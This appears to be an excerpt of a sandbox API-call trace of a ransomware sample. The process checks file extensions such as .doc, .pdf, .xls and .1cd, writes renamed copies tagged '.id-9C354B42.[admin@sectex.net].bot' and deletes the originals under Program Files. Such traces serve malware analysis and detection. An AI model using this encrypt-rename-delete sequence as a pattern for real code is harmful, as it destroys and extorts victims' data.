	[0050.672] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1
	[0050.672] lstrlenW (lpString=".bz2") returned 4
	[0050.672] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1
	[0050.672] lstrlenW (lpString=".7z") returned 3
	[0050.672] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1
	[0050.672] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.672] lstrlenW (lpString=".dbf") returned 4
	[0050.672] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1
	[0050.672] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.672] lstrlenW (lpString=".1cd") returned 4
	[0050.672] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1
	[0050.672] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.672] lstrlenW (lpString=".jpg") returned 4
	[0050.672] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1
	[0050.672] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.672] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.672] lstrlenW (lpString=".doc") returned 4
	[0050.672] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1
	[0050.672] lstrlenW (lpString=".docx") returned 5
	[0050.672] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1
	[0050.672] lstrlenW (lpString=".pdf") returned 4
	[0050.672] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1
	[0050.673] lstrlenW (lpString=".xls") returned 4
	[0050.673] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1
	[0050.673] lstrlenW (lpString=".xlsx") returned 5
	[0050.673] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1
	[0050.673] lstrlenW (lpString=".ppt") returned 4
	[0050.673] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1
	[0050.673] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.673] lstrlenW (lpString=".zip") returned 4
	[0050.673] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1
	[0050.673] lstrlenW (lpString=".rar") returned 4
	[0050.673] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1
	[0050.673] lstrlenW (lpString=".bz2") returned 4
	[0050.673] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1
	[0050.673] lstrlenW (lpString=".7z") returned 3
	[0050.673] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1
	[0050.673] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.673] lstrlenW (lpString=".dbf") returned 4
	[0050.673] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1
	[0050.673] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.673] lstrlenW (lpString=".1cd") returned 4
	[0050.673] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1
	[0050.673] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.673] lstrlenW (lpString=".jpg") returned 4
	[0050.673] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1
	[0050.673] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0050.673] lstrlenW (lpString="MSADDNDR.DLL") returned 12
	[0050.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.832] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=99136) returned 1
	[0050.832] CloseHandle (hObject=0x184) returned 1
	[0050.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 0x20
	[0050.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.832] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.832] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.832] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.833] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0050.833] GetLastError () returned 0x0
	[0050.833] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x18340, lpOverlapped=0x0) returned 1
	[0050.836] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x18350, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x18350, lpOverlapped=0x0) returned 1
	[0050.838] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0050.838] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0050.838] SetEndOfFile (hFile=0x1a8) returned 1
	[0050.838] CloseHandle (hObject=0x1a8) returned 1
	[0050.838] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.838] SetEndOfFile (hFile=0x184) returned 1
	[0050.840] CloseHandle (hObject=0x184) returned 1
	[0050.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0050.840] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 1
	[0050.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.840] lstrlenW (lpString=".doc") returned 4
	[0050.840] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0050.840] lstrlenW (lpString=".docx") returned 5
	[0050.840] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0050.840] lstrlenW (lpString=".pdf") returned 4
	[0050.840] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0050.840] lstrlenW (lpString=".xls") returned 4
	[0050.840] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0050.840] lstrlenW (lpString=".xlsx") returned 5
	[0050.840] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0050.840] lstrlenW (lpString=".ppt") returned 4
	[0050.840] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0050.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.841] lstrlenW (lpString=".zip") returned 4
	[0050.841] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0050.841] lstrlenW (lpString=".rar") returned 4
	[0050.841] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0050.841] lstrlenW (lpString=".bz2") returned 4
	[0050.841] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0050.841] lstrlenW (lpString=".7z") returned 3
	[0050.841] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0050.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.841] lstrlenW (lpString=".dbf") returned 4
	[0050.841] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0050.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.841] lstrlenW (lpString=".1cd") returned 4
	[0050.841] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0050.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.841] lstrlenW (lpString=".jpg") returned 4
	[0050.841] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0050.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.841] lstrlenW (lpString=".doc") returned 4
	[0050.841] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0050.841] lstrlenW (lpString=".docx") returned 5
	[0050.841] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0050.841] lstrlenW (lpString=".pdf") returned 4
	[0050.841] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0050.841] lstrlenW (lpString=".xls") returned 4
	[0050.841] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0050.841] lstrlenW (lpString=".xlsx") returned 5
	[0050.841] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0050.841] lstrlenW (lpString=".ppt") returned 4
	[0050.841] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0050.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.842] lstrlenW (lpString=".zip") returned 4
	[0050.842] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0050.842] lstrlenW (lpString=".rar") returned 4
	[0050.842] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0050.842] lstrlenW (lpString=".bz2") returned 4
	[0050.842] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0050.842] lstrlenW (lpString=".7z") returned 3
	[0050.842] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0050.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.842] lstrlenW (lpString=".dbf") returned 4
	[0050.842] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0050.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.842] lstrlenW (lpString=".1cd") returned 4
	[0050.842] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0050.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51
	[0050.842] lstrlenW (lpString=".jpg") returned 4
	[0050.842] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0050.842] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0050.842] lstrlenW (lpString="EEINTL.DLL") returned 10
	[0050.842] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.843] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=64096) returned 1
	[0050.843] CloseHandle (hObject=0x184) returned 1
	[0050.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 0x20
	[0050.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.844] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.844] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0050.844] GetLastError () returned 0x0
	[0050.844] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0xfa60, lpOverlapped=0x0) returned 1
	[0050.849] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xfa70, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xfa70, lpOverlapped=0x0) returned 1
	[0050.851] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0050.851] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0050.851] SetEndOfFile (hFile=0x1a8) returned 1
	[0050.851] CloseHandle (hObject=0x1a8) returned 1
	[0050.851] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.851] SetEndOfFile (hFile=0x184) returned 1
	[0050.852] CloseHandle (hObject=0x184) returned 1
	[0050.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0050.853] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 1
	[0050.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.853] lstrlenW (lpString=".doc") returned 4
	[0050.853] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0050.853] lstrlenW (lpString=".docx") returned 5
	[0050.853] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0050.853] lstrlenW (lpString=".pdf") returned 4
	[0050.853] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0050.853] lstrlenW (lpString=".xls") returned 4
	[0050.853] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0050.853] lstrlenW (lpString=".xlsx") returned 5
	[0050.853] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0050.853] lstrlenW (lpString=".ppt") returned 4
	[0050.853] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0050.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.853] lstrlenW (lpString=".zip") returned 4
	[0050.853] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0050.853] lstrlenW (lpString=".rar") returned 4
	[0050.853] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0050.853] lstrlenW (lpString=".bz2") returned 4
	[0050.853] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0050.853] lstrlenW (lpString=".7z") returned 3
	[0050.853] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0050.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.854] lstrlenW (lpString=".dbf") returned 4
	[0050.854] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0050.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.854] lstrlenW (lpString=".1cd") returned 4
	[0050.854] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0050.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.854] lstrlenW (lpString=".jpg") returned 4
	[0050.854] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0050.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.854] lstrlenW (lpString=".doc") returned 4
	[0050.854] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0050.854] lstrlenW (lpString=".docx") returned 5
	[0050.854] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0050.854] lstrlenW (lpString=".pdf") returned 4
	[0050.854] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0050.854] lstrlenW (lpString=".xls") returned 4
	[0050.854] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0050.854] lstrlenW (lpString=".xlsx") returned 5
	[0050.854] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0050.854] lstrlenW (lpString=".ppt") returned 4
	[0050.854] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0050.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.854] lstrlenW (lpString=".zip") returned 4
	[0050.854] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0050.854] lstrlenW (lpString=".rar") returned 4
	[0050.854] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0050.854] lstrlenW (lpString=".bz2") returned 4
	[0050.854] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0050.854] lstrlenW (lpString=".7z") returned 3
	[0050.854] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0050.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.854] lstrlenW (lpString=".dbf") returned 4
	[0050.855] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0050.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.855] lstrlenW (lpString=".1cd") returned 4
	[0050.855] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0050.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71
	[0050.855] lstrlenW (lpString=".jpg") returned 4
	[0050.855] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0050.855] lstrcmpiW (lpString1=".CNT", lpString2=".bot") returned 1
	[0050.855] lstrlenW (lpString="EQNEDT32.CNT") returned 12
	[0050.855] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.856] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=2557) returned 1
	[0050.856] CloseHandle (hObject=0x184) returned 1
	[0050.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 0x20
	[0050.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.857] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.857] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0050.857] GetLastError () returned 0x0
	[0050.857] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x9fd, lpOverlapped=0x0) returned 1
	[0050.858] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xa00, lpOverlapped=0x0) returned 1
	[0050.859] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0050.859] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0050.859] SetEndOfFile (hFile=0x1a8) returned 1
	[0050.860] CloseHandle (hObject=0x1a8) returned 1
	[0050.860] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.860] SetEndOfFile (hFile=0x184) returned 1
	[0050.860] CloseHandle (hObject=0x184) returned 1
	[0050.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0050.861] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 1
	[0050.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.861] lstrlenW (lpString=".doc") returned 4
	[0050.861] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1
	[0050.861] lstrlenW (lpString=".docx") returned 5
	[0050.861] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1
	[0050.861] lstrlenW (lpString=".pdf") returned 4
	[0050.861] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1
	[0050.861] lstrlenW (lpString=".xls") returned 4
	[0050.861] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1
	[0050.861] lstrlenW (lpString=".xlsx") returned 5
	[0050.861] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1
	[0050.861] lstrlenW (lpString=".ppt") returned 4
	[0050.861] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1
	[0050.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.861] lstrlenW (lpString=".zip") returned 4
	[0050.861] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1
	[0050.861] lstrlenW (lpString=".rar") returned 4
	[0050.861] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1
	[0050.861] lstrlenW (lpString=".bz2") returned 4
	[0050.861] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1
	[0050.862] lstrlenW (lpString=".7z") returned 3
	[0050.862] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1
	[0050.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.862] lstrlenW (lpString=".dbf") returned 4
	[0050.862] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1
	[0050.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.862] lstrlenW (lpString=".1cd") returned 4
	[0050.862] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1
	[0050.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.862] lstrlenW (lpString=".jpg") returned 4
	[0050.862] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1
	[0050.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
